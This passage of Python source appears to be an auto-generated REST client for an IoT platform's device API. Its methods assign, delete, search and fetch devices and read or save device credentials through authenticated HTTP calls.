    assignDeviceToCustomer
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.assign_device_to_customer_using_post(customer_id, device_id, async=True)
    >>> result = thread.get()
    :param async bool
    :param str customer_id: customerId (required)
    :param str device_id: deviceId (required)
    :return: Device
    If the method is called asynchronously,
    returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Delegate to the *_with_http_info variant; async callers receive the
    # request thread, sync callers receive the unwrapped response data.
    delegate = self.assign_device_to_customer_using_post_with_http_info
    if kwargs.get('async'):
        return delegate(customer_id, device_id, **kwargs)
    return delegate(customer_id, device_id, **kwargs)
def assign_device_to_customer_using_post_with_http_info(self, customer_id, device_id, **kwargs):
    """
    assignDeviceToCustomer

    POST /api/customer/{customerId}/device/{deviceId}

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.assign_device_to_customer_using_post_with_http_info(customer_id, device_id, async=True)
    >>> result = thread.get()
    :param async bool
    :param str customer_id: customerId (required)
    :param str device_id: deviceId (required)
    :return: Device
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['customer_id', 'device_id']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject keyword arguments this endpoint does not understand.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method assign_device_to_customer_using_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'customer_id' is set
    if ('customer_id' not in params) or (params['customer_id'] is None):
        raise ValueError("Missing the required parameter `customer_id` when calling `assign_device_to_customer_using_post`")
    # verify the required parameter 'device_id' is set
    if ('device_id' not in params) or (params['device_id'] is None):
        raise ValueError("Missing the required parameter `device_id` when calling `assign_device_to_customer_using_post`")

    collection_formats = {}

    path_params = {}
    if 'customer_id' in params:
        path_params['customerId'] = params['customer_id']
    if 'device_id' in params:
        path_params['deviceId'] = params['device_id']

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']

    # FIX: `async` is a reserved keyword since Python 3.7, so it cannot be
    # written as a literal keyword argument; pass it via dict unpacking.
    return self.api_client.call_api('/api/customer/{customerId}/device/{deviceId}', 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Device',
                                    auth_settings=auth_settings,
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats,
                                    **{'async': params.get('async')})
def assign_device_to_public_customer_using_post(self, device_id, **kwargs):
    """
    assignDeviceToPublicCustomer

    Synchronous by default; pass async=True to receive a request thread
    whose .get() yields the result instead.
    >>> thread = api.assign_device_to_public_customer_using_post(device_id, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_id: deviceId (required)
    :return: Device
             If the method is called asynchronously,
             returns the request thread.
    """
    # Only the payload is wanted here, not the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both go through the *_with_http_info variant.
    return self.assign_device_to_public_customer_using_post_with_http_info(
        device_id, **kwargs)
def assign_device_to_public_customer_using_post_with_http_info(self, device_id, **kwargs):
    """
    assignDeviceToPublicCustomer

    POST /api/customer/public/device/{deviceId}

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.assign_device_to_public_customer_using_post_with_http_info(device_id, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_id: deviceId (required)
    :return: Device
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['device_id']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject keyword arguments this endpoint does not understand.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method assign_device_to_public_customer_using_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'device_id' is set
    if ('device_id' not in params) or (params['device_id'] is None):
        raise ValueError("Missing the required parameter `device_id` when calling `assign_device_to_public_customer_using_post`")

    collection_formats = {}

    path_params = {}
    if 'device_id' in params:
        path_params['deviceId'] = params['device_id']

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']

    # FIX: `async` is a reserved keyword since Python 3.7, so it cannot be
    # written as a literal keyword argument; pass it via dict unpacking.
    return self.api_client.call_api('/api/customer/public/device/{deviceId}', 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Device',
                                    auth_settings=auth_settings,
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats,
                                    **{'async': params.get('async')})
def delete_device_using_delete(self, device_id, **kwargs):
    """
    deleteDevice

    Synchronous by default; pass async=True to receive a request thread
    whose .get() yields the result instead.
    >>> thread = api.delete_device_using_delete(device_id, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_id: deviceId (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Only the payload is wanted here, not the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both go through the *_with_http_info variant.
    return self.delete_device_using_delete_with_http_info(device_id, **kwargs)
def delete_device_using_delete_with_http_info(self, device_id, **kwargs):
    """
    deleteDevice

    DELETE /api/device/{deviceId}

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.delete_device_using_delete_with_http_info(device_id, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_id: deviceId (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['device_id']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject keyword arguments this endpoint does not understand.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_device_using_delete" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'device_id' is set
    if ('device_id' not in params) or (params['device_id'] is None):
        raise ValueError("Missing the required parameter `device_id` when calling `delete_device_using_delete`")

    collection_formats = {}

    path_params = {}
    if 'device_id' in params:
        path_params['deviceId'] = params['device_id']

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']

    # FIX: `async` is a reserved keyword since Python 3.7, so it cannot be
    # written as a literal keyword argument; pass it via dict unpacking.
    return self.api_client.call_api('/api/device/{deviceId}', 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats,
                                    **{'async': params.get('async')})
def find_by_query_using_post1(self, query, **kwargs):
    """
    findByQuery

    Synchronous by default; pass async=True to receive a request thread
    whose .get() yields the result instead.
    >>> thread = api.find_by_query_using_post1(query, async=True)
    >>> result = thread.get()
    :param async bool
    :param DeviceSearchQuery query: query (required)
    :return: list[Device]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Only the payload is wanted here, not the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both go through the *_with_http_info variant.
    return self.find_by_query_using_post1_with_http_info(query, **kwargs)
def find_by_query_using_post1_with_http_info(self, query, **kwargs):
    """
    findByQuery

    POST /api/devices with the search query as the request body.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.find_by_query_using_post1_with_http_info(query, async=True)
    >>> result = thread.get()
    :param async bool
    :param DeviceSearchQuery query: query (required)
    :return: list[Device]
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['query']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject keyword arguments this endpoint does not understand.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method find_by_query_using_post1" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'query' is set
    if ('query' not in params) or (params['query'] is None):
        raise ValueError("Missing the required parameter `query` when calling `find_by_query_using_post1`")

    collection_formats = {}

    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = None
    if 'query' in params:
        body_params = params['query']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']

    # FIX: `async` is a reserved keyword since Python 3.7, so it cannot be
    # written as a literal keyword argument; pass it via dict unpacking.
    return self.api_client.call_api('/api/devices', 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='list[Device]',
                                    auth_settings=auth_settings,
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats,
                                    **{'async': params.get('async')})
def get_customer_devices_using_get(self, customer_id, limit, **kwargs):
    """
    getCustomerDevices

    Synchronous by default; pass async=True to receive a request thread
    whose .get() yields the result instead.
    >>> thread = api.get_customer_devices_using_get(customer_id, limit, async=True)
    >>> result = thread.get()
    :param async bool
    :param str customer_id: customerId (required)
    :param str limit: limit (required)
    :param str type: type
    :param str text_search: textSearch
    :param str id_offset: idOffset
    :param str text_offset: textOffset
    :return: TextPageDataDevice
             If the method is called asynchronously,
             returns the request thread.
    """
    # Only the payload is wanted here, not the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both go through the *_with_http_info variant.
    return self.get_customer_devices_using_get_with_http_info(
        customer_id, limit, **kwargs)
def get_customer_devices_using_get_with_http_info(self, customer_id, limit, **kwargs):
    """
    getCustomerDevices

    GET /api/customer/{customerId}/devices with paging/filter query params.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.get_customer_devices_using_get_with_http_info(customer_id, limit, async=True)
    >>> result = thread.get()
    :param async bool
    :param str customer_id: customerId (required)
    :param str limit: limit (required)
    :param str type: type
    :param str text_search: textSearch
    :param str id_offset: idOffset
    :param str text_offset: textOffset
    :return: TextPageDataDevice
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['customer_id', 'limit', 'type', 'text_search', 'id_offset', 'text_offset']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject keyword arguments this endpoint does not understand.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_customer_devices_using_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'customer_id' is set
    if ('customer_id' not in params) or (params['customer_id'] is None):
        raise ValueError("Missing the required parameter `customer_id` when calling `get_customer_devices_using_get`")
    # verify the required parameter 'limit' is set
    if ('limit' not in params) or (params['limit'] is None):
        raise ValueError("Missing the required parameter `limit` when calling `get_customer_devices_using_get`")

    collection_formats = {}

    path_params = {}
    if 'customer_id' in params:
        path_params['customerId'] = params['customer_id']

    query_params = []
    if 'type' in params:
        query_params.append(('type', params['type']))
    if 'text_search' in params:
        query_params.append(('textSearch', params['text_search']))
    if 'id_offset' in params:
        query_params.append(('idOffset', params['id_offset']))
    if 'text_offset' in params:
        query_params.append(('textOffset', params['text_offset']))
    if 'limit' in params:
        query_params.append(('limit', params['limit']))

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']

    # FIX: `async` is a reserved keyword since Python 3.7, so it cannot be
    # written as a literal keyword argument; pass it via dict unpacking.
    return self.api_client.call_api('/api/customer/{customerId}/devices', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='TextPageDataDevice',
                                    auth_settings=auth_settings,
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats,
                                    **{'async': params.get('async')})
def get_device_by_id_using_get(self, device_id, **kwargs):
    """
    getDeviceById

    Synchronous by default; pass async=True to receive a request thread
    whose .get() yields the result instead.
    >>> thread = api.get_device_by_id_using_get(device_id, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_id: deviceId (required)
    :return: Device
             If the method is called asynchronously,
             returns the request thread.
    """
    # Only the payload is wanted here, not the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both go through the *_with_http_info variant.
    return self.get_device_by_id_using_get_with_http_info(device_id, **kwargs)
def get_device_by_id_using_get_with_http_info(self, device_id, **kwargs):
    """
    getDeviceById

    GET /api/device/{deviceId}

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.get_device_by_id_using_get_with_http_info(device_id, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_id: deviceId (required)
    :return: Device
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['device_id']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject keyword arguments this endpoint does not understand.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_device_by_id_using_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'device_id' is set
    if ('device_id' not in params) or (params['device_id'] is None):
        raise ValueError("Missing the required parameter `device_id` when calling `get_device_by_id_using_get`")

    collection_formats = {}

    path_params = {}
    if 'device_id' in params:
        path_params['deviceId'] = params['device_id']

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']

    # FIX: `async` is a reserved keyword since Python 3.7, so it cannot be
    # written as a literal keyword argument; pass it via dict unpacking.
    return self.api_client.call_api('/api/device/{deviceId}', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Device',
                                    auth_settings=auth_settings,
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats,
                                    **{'async': params.get('async')})
def get_device_credentials_by_device_id_using_get(self, device_id, **kwargs):
    """
    getDeviceCredentialsByDeviceId

    Synchronous by default; pass async=True to receive a request thread
    whose .get() yields the result instead.
    >>> thread = api.get_device_credentials_by_device_id_using_get(device_id, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_id: deviceId (required)
    :return: DeviceCredentials
             If the method is called asynchronously,
             returns the request thread.
    """
    # Only the payload is wanted here, not the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both go through the *_with_http_info variant.
    return self.get_device_credentials_by_device_id_using_get_with_http_info(
        device_id, **kwargs)
def get_device_credentials_by_device_id_using_get_with_http_info(self, device_id, **kwargs):
    """
    getDeviceCredentialsByDeviceId

    GET /api/device/{deviceId}/credentials

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.get_device_credentials_by_device_id_using_get_with_http_info(device_id, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_id: deviceId (required)
    :return: DeviceCredentials
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['device_id']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject keyword arguments this endpoint does not understand.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_device_credentials_by_device_id_using_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'device_id' is set
    if ('device_id' not in params) or (params['device_id'] is None):
        raise ValueError("Missing the required parameter `device_id` when calling `get_device_credentials_by_device_id_using_get`")

    collection_formats = {}

    path_params = {}
    if 'device_id' in params:
        path_params['deviceId'] = params['device_id']

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']

    # FIX: `async` is a reserved keyword since Python 3.7, so it cannot be
    # written as a literal keyword argument; pass it via dict unpacking.
    return self.api_client.call_api('/api/device/{deviceId}/credentials', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DeviceCredentials',
                                    auth_settings=auth_settings,
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats,
                                    **{'async': params.get('async')})
def get_device_types_using_get(self, **kwargs):
    """
    getDeviceTypes

    Synchronous by default; pass async=True to receive a request thread
    whose .get() yields the result instead.
    >>> thread = api.get_device_types_using_get(async=True)
    >>> result = thread.get()
    :param async bool
    :return: list[EntitySubtype]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Only the payload is wanted here, not the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both go through the *_with_http_info variant.
    return self.get_device_types_using_get_with_http_info(**kwargs)
def get_device_types_using_get_with_http_info(self, **kwargs):
    """
    getDeviceTypes

    GET /api/device/types (no parameters).

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.get_device_types_using_get_with_http_info(async=True)
    >>> result = thread.get()
    :param async bool
    :return: list[EntitySubtype]
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = []
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject keyword arguments this endpoint does not understand.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_device_types_using_get" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']

    # FIX: `async` is a reserved keyword since Python 3.7, so it cannot be
    # written as a literal keyword argument; pass it via dict unpacking.
    return self.api_client.call_api('/api/device/types', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='list[EntitySubtype]',
                                    auth_settings=auth_settings,
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats,
                                    **{'async': params.get('async')})
def get_devices_by_ids_using_get(self, device_ids, **kwargs):
    """
    getDevicesByIds

    Synchronous by default; pass async=True to receive a request thread
    whose .get() yields the result instead.
    >>> thread = api.get_devices_by_ids_using_get(device_ids, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_ids: deviceIds (required)
    :return: list[Device]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Only the payload is wanted here, not the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both go through the *_with_http_info variant.
    return self.get_devices_by_ids_using_get_with_http_info(device_ids, **kwargs)
def get_devices_by_ids_using_get_with_http_info(self, device_ids, **kwargs):
    """
    getDevicesByIds

    GET /api/devices?deviceIds=...

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.get_devices_by_ids_using_get_with_http_info(device_ids, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_ids: deviceIds (required)
    :return: list[Device]
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['device_ids']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject keyword arguments this endpoint does not understand.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_devices_by_ids_using_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'device_ids' is set
    if ('device_ids' not in params) or (params['device_ids'] is None):
        raise ValueError("Missing the required parameter `device_ids` when calling `get_devices_by_ids_using_get`")

    collection_formats = {}

    path_params = {}

    query_params = []
    if 'device_ids' in params:
        query_params.append(('deviceIds', params['device_ids']))

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']

    # FIX: `async` is a reserved keyword since Python 3.7, so it cannot be
    # written as a literal keyword argument; pass it via dict unpacking.
    return self.api_client.call_api('/api/devices', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='list[Device]',
                                    auth_settings=auth_settings,
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats,
                                    **{'async': params.get('async')})
def get_tenant_device_using_get(self, device_name, **kwargs):
    """
    getTenantDevice

    Synchronous by default; pass async=True to receive a request thread
    whose .get() yields the result instead.
    >>> thread = api.get_tenant_device_using_get(device_name, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_name: deviceName (required)
    :return: Device
             If the method is called asynchronously,
             returns the request thread.
    """
    # Only the payload is wanted here, not the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both go through the *_with_http_info variant.
    return self.get_tenant_device_using_get_with_http_info(device_name, **kwargs)
def get_tenant_device_using_get_with_http_info(self, device_name, **kwargs):
    """
    getTenantDevice

    GET /api/tenant/devices?deviceName=...

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.get_tenant_device_using_get_with_http_info(device_name, async=True)
    >>> result = thread.get()
    :param async bool
    :param str device_name: deviceName (required)
    :return: Device
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['device_name']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject keyword arguments this endpoint does not understand.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_tenant_device_using_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'device_name' is set
    if ('device_name' not in params) or (params['device_name'] is None):
        raise ValueError("Missing the required parameter `device_name` when calling `get_tenant_device_using_get`")

    collection_formats = {}

    path_params = {}

    query_params = []
    if 'device_name' in params:
        query_params.append(('deviceName', params['device_name']))

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']

    # FIX: `async` is a reserved keyword since Python 3.7, so it cannot be
    # written as a literal keyword argument; pass it via dict unpacking.
    return self.api_client.call_api('/api/tenant/devices', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Device',
                                    auth_settings=auth_settings,
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats,
                                    **{'async': params.get('async')})
def save_device_credentials_using_post(self, device_credentials, **kwargs):
    """
    saveDeviceCredentials

    Synchronous by default; pass async=True to receive a request thread
    whose .get() yields the result instead.
    >>> thread = api.save_device_credentials_using_post(device_credentials, async=True)
    >>> result = thread.get()
    :param async bool
    :param DeviceCredentials device_credentials: deviceCredentials (required)
    :return: DeviceCredentials
             If the method is called asynchronously,
             returns the request thread.
    """
    # Only the payload is wanted here, not the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both go through the *_with_http_info variant.
    return self.save_device_credentials_using_post_with_http_info(
        device_credentials, **kwargs)
def save_device_credentials_using_post_with_http_info(self, device_credentials, **kwargs):
    """
    saveDeviceCredentials

    POST /api/device/credentials with the credentials as the request body.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.save_device_credentials_using_post_with_http_info(device_credentials, async=True)
    >>> result = thread.get()
    :param async bool
    :param DeviceCredentials device_credentials: deviceCredentials (required)
    :return: DeviceCredentials
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['device_credentials']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject keyword arguments this endpoint does not understand.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method save_device_credentials_using_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'device_credentials' is set
    if ('device_credentials' not in params) or (params['device_credentials'] is None):
        raise ValueError("Missing the required parameter `device_credentials` when calling `save_device_credentials_using_post`")

    collection_formats = {}

    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = None
    if 'device_credentials' in params:
        body_params = params['device_credentials']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['*/*'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['X-Authorization']

    # FIX: `async` is a reserved keyword since Python 3.7, so it cannot be
    # written as a literal keyword argument; pass it via dict unpacking.
    return self.api_client.call_api('/api/device/credentials', 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DeviceCredentials',
                                    auth_settings=auth_settings,
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats,
                                    **{'async': params.get('async')})
def save_device_using_post(self, device, **kwargs):
    """
    saveDevice

    Synchronous by default; pass async=True to receive a request thread
    whose .get() yields the result instead.
    >>> thread = api.save_device_using_post(device, async=True)
    >>> result = thread.get()
    :param async bool
    :param Device device: device (required)
    :return: Device
             If the method is called asynchronously,
             returns the request thread.
    """
    # Only the payload is wanted here, not the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both go through the *_with_http_info variant.
    return self.save_device_using_post_with_http_info(device, **kwargs)
def save_device_using_post_with_http_info(self, device, **kwargs):
    """
    saveDevice
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.save_device_using_post_with_http_info(device, async=True)
    >>> result = thread.get()
    :param async bool
    :param Device device: device (required)
    :return: Device
    If the method is called asynchronously,
    returns the request thread.
    """
    # Accepted call parameters: the API argument plus client-control kwargs.
    all_params = ['device']
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() snapshots self/device/kwargs AND all_params into `params`;
